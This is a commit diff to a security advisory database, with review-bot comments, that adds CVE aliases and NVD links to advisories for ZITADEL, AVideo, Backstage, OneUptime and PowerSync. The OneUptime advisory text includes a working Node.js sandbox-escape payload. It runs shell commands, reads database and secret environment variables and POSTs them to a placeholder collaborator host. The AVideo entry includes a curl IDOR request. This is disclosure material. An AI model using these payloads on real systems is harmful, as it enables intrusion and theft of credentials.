Commit 6046e4b

1 parent ad959ab commit 6046e4b

9 files changed

Lines changed: 51 additions & 19 deletions

advisories/github-reviewed/2025/12/GHSA-pfrf-9r5f-73f5/GHSA-pfrf-9r5f-73f5.json

Lines changed: 9 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-pfrf-9r5f-73f5",
4-
"modified": "2025-12-08T22:19:38Z",
4+
"modified": "2026-03-09T15:47:05Z",
55
"published": "2025-12-08T22:19:38Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2026-29067"
8+
],
79
"summary": "ZITADEL Vulnerable to Account Takeover Due to Improper Instance Validation in V2 Login",
810
"details": "### Summary\n\nA potential vulnerability exists in ZITADEL's password reset mechanism in login V2. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.\n\n### Impact\n\nIf an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user's password and gain unauthorized access to their account.\n\nIt's important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.\n\n### Affected Versions\n\nSystems using the login UI (v2) and running one of the following versions are affected:\n- **v4.x**: `4.0.0-rc.1` through `4.7.0`\n\n### Patches\n\nThe vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the X-Forwarded-Host and Forwarded headers against the instance custom and trusted domains.\n\nBefore you upgrade, ensure that:\n- the `ZITADEL_API_URL` is set and is pointing to your instance, resp. system in multi-instance deployments.\n- the HTTP `host` (or a `x-forwarded-host`) is passed in your reverse proxy to the login UI.\n- a `x-zitadel-instance-host` (or `x-zitadel-forward-host`) is set in your reverse for multi-instance deployments. 
If you're running a single instance solution, you don't need to take any actions.\n\nPatched versions:\n- 4.x: Upgrade to >=[4.7.1](https://github.com/zitadel/zitadel/releases/tag/v4.7.1)\n\n### Workarounds\n\nThe recommended solution is to update ZITADEL to a patched version.\n\nA ZITADEL fronting proxy can be configured to delete all forwarded header values or set it to the requested host before sending requests to ZITADEL self-hosted environments.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.",
911
"severity": [
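Review bot: The alias CVE-2026-29067 added in this hunk is what downstream consumers will key on, so the unchanged `details` context here deserves a pass at the source advisory before it is mirrored further: "is set in your reverse for multi-instance deployments" is missing the word "proxy", and "resp. system in multi-instance deployments" is hard to parse for readers who do not know the German abbreviation. Both belong to the GHSA text rather than this export, so fix them there and regenerate this file. The new `modified` value (2026-03-09T15:47:05Z) correctly stays later than `published` (2025-12-08T22:19:38Z).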
@@ -95,6 +97,10 @@
9597
"type": "WEB",
9698
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-pfrf-9r5f-73f5"
9799
},
100+
{
101+
"type": "ADVISORY",
102+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29067"
103+
},
98104
{
99105
"type": "WEB",
100106
"url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96"
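Review bot: The NVD link is typed `ADVISORY`, which is right, but the commit reference in the trailing context of this hunk, `"url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96"`, is still typed `WEB`. The OSV schema defines a `FIX` reference type for exactly this kind of link, and tooling that looks for fix commits by type will not find it as `WEB`; consider re-typing it in the same pass, since the advisory text says the patch is in 4.7.1 and this commit is the only fix pointer in the record.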
@@ -111,6 +117,6 @@
111117
"severity": "HIGH",
112118
"github_reviewed": true,
113119
"github_reviewed_at": "2025-12-08T22:19:38Z",
114-
"nvd_published_at": null
120+
"nvd_published_at": "2026-03-07T15:15:54Z"
115121
}
116122
}
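Review bot: `nvd_published_at` moves from `null` to 2026-03-07T15:15:54Z, which sits between `github_reviewed_at` (2025-12-08T22:19:38Z) and the new `modified` value in the first hunk of this file (2026-03-09T15:47:05Z), so the three timestamps remain in the expected order. A populated NVD date only makes sense together with the CVE alias and the NVD reference, and both land in the earlier hunks of this same commit, so the record stays self-consistent.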

advisories/github-reviewed/2026/03/GHSA-25rw-g6ff-fmg8/GHSA-25rw-g6ff-fmg8.json

Lines changed: 6 additions & 2 deletions
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-25rw-g6ff-fmg8",
4-
"modified": "2026-03-04T22:51:16Z",
4+
"modified": "2026-03-09T15:46:19Z",
55
"published": "2026-03-04T22:51:16Z",
66
"aliases": [
77
"CVE-2026-29193"
@@ -65,6 +65,10 @@
6565
"type": "WEB",
6666
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-25rw-g6ff-fmg8"
6767
},
68+
{
69+
"type": "ADVISORY",
70+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29193"
71+
},
6872
{
6973
"type": "PACKAGE",
7074
"url": "https://github.com/zitadel/zitadel"
@@ -81,6 +85,6 @@
8185
"severity": "HIGH",
8286
"github_reviewed": true,
8387
"github_reviewed_at": "2026-03-04T22:51:16Z",
84-
"nvd_published_at": null
88+
"nvd_published_at": "2026-03-07T15:15:55Z"
8589
}
8690
}
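Review bot: This file already carried its CVE alias, so only the `modified` bump, the `ADVISORY` reference and `nvd_published_at` change, and the same three-field update is applied to the four other advisories in this commit that already had an alias. All of their NVD timestamps read 2026-03-07T15:15:55Z, one second after the ZITADEL entry above, which is consistent with a single NVD batch; nothing further to change here.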

advisories/github-reviewed/2026/03/GHSA-6rx5-m2rc-hmf7/GHSA-6rx5-m2rc-hmf7.json

Lines changed: 6 additions & 2 deletions
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-6rx5-m2rc-hmf7",
4-
"modified": "2026-03-04T22:53:42Z",
4+
"modified": "2026-03-09T15:46:34Z",
55
"published": "2026-03-04T22:53:42Z",
66
"aliases": [
77
"CVE-2026-29192"
@@ -59,6 +59,10 @@
5959
"type": "WEB",
6060
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-6rx5-m2rc-hmf7"
6161
},
62+
{
63+
"type": "ADVISORY",
64+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29192"
65+
},
6266
{
6367
"type": "PACKAGE",
6468
"url": "https://github.com/zitadel/zitadel"
@@ -75,6 +79,6 @@
7579
"severity": "HIGH",
7680
"github_reviewed": true,
7781
"github_reviewed_at": "2026-03-04T22:53:42Z",
78-
"nvd_published_at": null
82+
"nvd_published_at": "2026-03-07T15:15:55Z"
7983
}
8084
}

advisories/github-reviewed/2026/03/GHSA-6w2r-cfpc-23r5/GHSA-6w2r-cfpc-23r5.json

Lines changed: 4 additions & 2 deletions
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-6w2r-cfpc-23r5",
4-
"modified": "2026-03-07T02:25:48Z",
4+
"modified": "2026-03-09T15:47:26Z",
55
"published": "2026-03-07T02:25:48Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2026-30885"
8+
],
79
"summary": "AVideo has Unauthenticated IDOR - Playlist Information Disclosure",
810
"details": "**Product:** AVideo (https://github.com/WWBN/AVideo)\n**Version:** Latest (tested March 2026)\n**Type:** Insecure Direct Object Reference (IDOR)\n**Auth Required:** No\n**User Interaction:** None\n\n## Summary\n\nThe `/objects/playlistsFromUser.json.php` endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform.\n\n## Root Cause\n\nThe endpoint accepts a `users_id` parameter and directly queries the database without any authentication or authorization check.\n**File:** `objects/playlistsFromUser.json.php`\n\n```php\nif (empty($_GET['users_id'])) {\n die(\"You need a user\");\n}\n// NO AUTHENTICATION CHECK\n// NO AUTHORIZATION CHECK (does this user_id belong to the requester?)\n$row = PlayList::getAllFromUser($_GET['users_id'], false);\necho json_encode($row);\n```\n\nThere is no call to `User::isLogged()` or any comparison between the requesting user and the target `users_id`.\n\n## Affected Code\n\n| File | Line | Issue |\n|------|------|-------|\n| `objects/playlistsFromUser.json.php` | 10-21 | No authentication or authorization check before returning playlist data |\n\n## Proof of Concept\n\n### Retrieve admin's playlists (user ID 1)\n\n```bash\ncurl \"https://TARGET/objects/playlistsFromUser.json.php?users_id=1\"\n```\n\n**Response:**\n```json\n[\n {\"id\":false,\"name\":\"Watch Later\",\"status\":\"watch_later\",\"users_id\":1},\n {\"id\":false,\"name\":\"Favorite\",\"status\":\"favorite\",\"users_id\":1}\n]\n```\n\n<img width=\"1805\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a13c9c2f-29be-4399-98d2-7570ca30465a\" />\n\n\n## Impact\n\n- **Privacy violation** — any visitor can see all users' playlist names and contents\n- **User enumeration** — valid user IDs can be discovered by iterating through IDs\n- 
**Information gathering** — playlist names and video IDs reveal user interests and private content preferences\n- **Targeted attacks** — gathered information can be used for social engineering or further exploitation\n\n## Remediation\n\nAdd authentication and authorization checks:\n\n```php\n// Option 1: Require authentication + only own playlists\nif (!User::isLogged()) {\n die(json_encode(['error' => 'Authentication required']));\n}\nif ($_GET['users_id'] != User::getId() && !User::isAdmin()) {\n die(json_encode(['error' => 'Access denied']));\n}\n\n// Option 2: If public playlists are intended, filter by visibility\n$row = PlayList::getAllFromUser($_GET['users_id'], false, 'public');\n```",
911
"severity": [
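Review bot: With CVE-2026-30885 now attached, two points in the unchanged `details` context should be checked against the source advisory. The affected version is given only as "Latest (tested March 2026)", so the `affected` ranges outside this hunk need a concrete version or commit for the alias to be actionable. In the remediation, "Option 2" calls `PlayList::getAllFromUser($_GET['users_id'], false, 'public')` with a third argument, while the vulnerable snippet shows the same method taking two; confirm that signature exists in the project before it is recommended as a fix, or mark it as a proposed change.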

advisories/github-reviewed/2026/03/GHSA-8qp7-fhr9-fw53/GHSA-8qp7-fhr9-fw53.json

Lines changed: 6 additions & 2 deletions
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-8qp7-fhr9-fw53",
4-
"modified": "2026-03-05T00:23:51Z",
4+
"modified": "2026-03-09T15:46:58Z",
55
"published": "2026-03-05T00:23:51Z",
66
"aliases": [
77
"CVE-2026-29184"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-8qp7-fhr9-fw53"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29184"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://backstage.io/docs/overview/threat-model"
@@ -63,6 +67,6 @@
6367
"severity": "LOW",
6468
"github_reviewed": true,
6569
"github_reviewed_at": "2026-03-05T00:23:51Z",
66-
"nvd_published_at": null
70+
"nvd_published_at": "2026-03-07T15:15:55Z"
6771
}
6872
}

advisories/github-reviewed/2026/03/GHSA-928r-fm4v-mvrw/GHSA-928r-fm4v-mvrw.json

Lines changed: 6 additions & 2 deletions
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-928r-fm4v-mvrw",
4-
"modified": "2026-03-05T00:12:07Z",
4+
"modified": "2026-03-09T15:46:44Z",
55
"published": "2026-03-05T00:12:07Z",
66
"aliases": [
77
"CVE-2026-29186"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://backstage.io/docs/features/techdocs/architecture"
@@ -68,6 +72,6 @@
6872
"severity": "HIGH",
6973
"github_reviewed": true,
7074
"github_reviewed_at": "2026-03-05T00:12:07Z",
71-
"nvd_published_at": null
75+
"nvd_published_at": "2026-03-07T15:15:55Z"
7276
}
7377
}

advisories/github-reviewed/2026/03/GHSA-95v5-prp4-5gv5/GHSA-95v5-prp4-5gv5.json

Lines changed: 6 additions & 2 deletions
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-95v5-prp4-5gv5",
4-
"modified": "2026-03-05T00:20:45Z",
4+
"modified": "2026-03-09T15:46:52Z",
55
"published": "2026-03-05T00:20:45Z",
66
"aliases": [
77
"CVE-2026-29185"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-95v5-prp4-5gv5"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29185"
49+
},
4650
{
4751
"type": "PACKAGE",
4852
"url": "https://github.com/backstage/backstage"
@@ -55,6 +59,6 @@
5559
"severity": "LOW",
5660
"github_reviewed": true,
5761
"github_reviewed_at": "2026-03-05T00:20:45Z",
58-
"nvd_published_at": null
62+
"nvd_published_at": "2026-03-07T15:15:55Z"
5963
}
6064
}

advisories/github-reviewed/2026/03/GHSA-h343-gg57-2q67/GHSA-h343-gg57-2q67.json

Lines changed: 4 additions & 2 deletions
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-h343-gg57-2q67",
4-
"modified": "2026-03-07T02:30:09Z",
4+
"modified": "2026-03-09T15:47:34Z",
55
"published": "2026-03-07T02:30:09Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2026-30887"
8+
],
79
"summary": "OneUpTime's Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE",
810
"details": "### Summary\nOneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.\n\n### Details\nThe root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:\n\n```typescript\nconst vmPromise = vm.runInContext(script, sandbox, { ... });\n```\n\nThe Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code. \n\nWhen a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container). \n\nAn attacker can use the payload `const proc = this.constructor.constructor('return process')();` to step out of the sandbox context and grab the host's native `process` object. From there, they can require `child_process` to execute arbitrary shell commands. \n\nSince the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.\n\n### PoC\nThis exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least \"Project Member\" permissions.\n\n1. 
**Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).\n2. **Navigate**: Go to **Monitors** > **Create New Monitor**.\n3. **Monitor Type**: Select **Synthetic Monitor**.\n4. **Browser/Screen Settings**: Ensure **Chromium** is selected for \"Browser Types\" and **Desktop** is selected for \"Screen Size Types\".\n5. **Payload Injection**: Scroll down to the \"Playwright Code\" editor. Delete the default template and paste the following malicious JavaScript payload:\n\n```javascript\nreturn new Promise((resolve) => {\n try {\n // 1. Traverse the prototype chain to grab the host's process object\n const proc = this.constructor.constructor('return process')();\n \n // 2. Load the host's child_process module & run a system command\n const cp = proc.mainModule.require('child_process');\n const output = cp.execSync('ls -la /usr/src/app').toString();\n \n // 3. (Optional) Read sensitive environment secrets\n const secret = proc.env.ONEUPTIME_SECRET;\n const db_pass = proc.env.DATABASE_PASSWORD;\n \n // 4. Exfiltrate the data via the native `http` module\n const http_real = proc.mainModule.require('http');\n const req = http_real.request({ \n hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE', \n port: 80, \n path: '/', \n method: 'POST' \n }, (res) => {\n resolve(\"EXFILTRATION_STATUS: \" + res.statusCode);\n });\n \n req.on('error', (e) => resolve(\"EXFILTRATION_ERROR: \" + e.message));\n \n const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });\n req.write(payloadData);\n req.end();\n } catch(e) {\n resolve(\"CRITICAL_ERROR: \" + e.message);\n }\n});\n```\n\n6. **Save & Execute**: Click **Save**. 
Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.\n\nOUTPUT:\n```\n{\"rce_output\":\"total 296\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\\n\"}\n\n```\n<img width=\"1364\" height=\"470\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba\" />\n\n\n### Impact\n**What kind of vulnerability is it?** \nRemote Code Execution (RCE) / Code Injection / Sandbox Escape.\n\n**Who is impacted?** \nAny OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.\n\n---",
911
"severity": [
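Review bot: Now that CVE-2026-30887 is attached, two things in the `details` context should be corrected at the source advisory. The link `[Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts)` is a relative path that resolves nowhere once this JSON is consumed outside GitHub and should be an absolute repository URL. The affected population is stated only in prose ("version <= 10.0.0"), so the `affected` ranges outside this hunk should be checked against that bound. The summary also spells the product "OneUpTime" while the details use "OneUptime"; pick one.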

advisories/github-reviewed/2026/03/GHSA-q6wc-xx4m-92fj/GHSA-q6wc-xx4m-92fj.json

Lines changed: 4 additions & 2 deletions
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-q6wc-xx4m-92fj",
4-
"modified": "2026-03-07T02:23:25Z",
4+
"modified": "2026-03-09T15:47:13Z",
55
"published": "2026-03-07T02:23:24Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2026-30870"
8+
],
79
"summary": "PowerSync: Some sync filters ignored on 1.20.0 using `config.edition: 3`",
810
"details": "### Impact\n\nIn version **1.20.0**, when using new sync streams with `config.edition: 3`, certain subquery filters were ignored when determining which data to sync to users.\n\nDepending on the sync stream configuration, this could result in authenticated users syncing data that should have been restricted.\n\nOnly queries that gate synchronization using subqueries without partitioning the result set are affected.\n\nNot affected:\n * Sync rules (bucket_definitions)\n * Sync streams using `config.edition: 2`\n * No data is exposed without authenticating\n\n### Patches\n\nThe issue is **fixed in 1.20.1**. Restarting the service with the new version is sufficient - no reprocessing of sync streams is required.\n\nAny data that users erroneously synced will be automatically removed from those devices when they connect again.\n\nPowerSync has updated all affected PowerSync Cloud instances to the fixed version, and is reaching out to affected customers.\n\nFor self-hosted PowerSync instances, update to the latest version and restart.\n\n### Affected queries\n\nSubqueries used only to determine whether or not a table should be synced (without partitioning the data itself) are affected. 
Examples:\n\n```sql\n-- Goal: Sync a table only to admin users\n-- 1.20.0: all authenticated users would sync this table\nSELECT * FROM sensitive_table WHERE auth.user_id() IN (SELECT user_id FROM admins)\nSELECT * FROM sensitive_table WHERE 1 IN (SELECT 1 FROM users WHERE id = auth.user_id() AND is_admin = TRUE)\n\n-- Goal: Sync a table only if authorized\n-- 1.20.0: all authenticated users would sync this table\nSELECT * FROM sensitive_table WHERE 'sensitive_table' IN (SELECT table_name FROM synced_table WHERE \"user\" = auth.user_id())\nSELECT * FROM sensitive_table WHERE 'sensitive_table' IN auth.parameter('allowed_tables')\n```\n\nQueries that partition data (for example `SELECT * FROM sensitive_table WHERE owner IN (SELECT id FROM users WHERE is_admin AND id = auth.user_id())`) are not affected by this issue.",
911
"severity": [
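Review bot: In the `details` context, the third bullet under "Not affected" ("No data is exposed without authenticating") is a statement about the bug rather than a configuration like the two bullets above it, so it reads better as its own sentence after the list. The affected range appears only in prose (1.20.0 affected, fixed in 1.20.1); verify that the `affected` ranges outside this hunk encode that same introduced/fixed pair now that CVE-2026-30870 is attached and the record will be matched by version.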
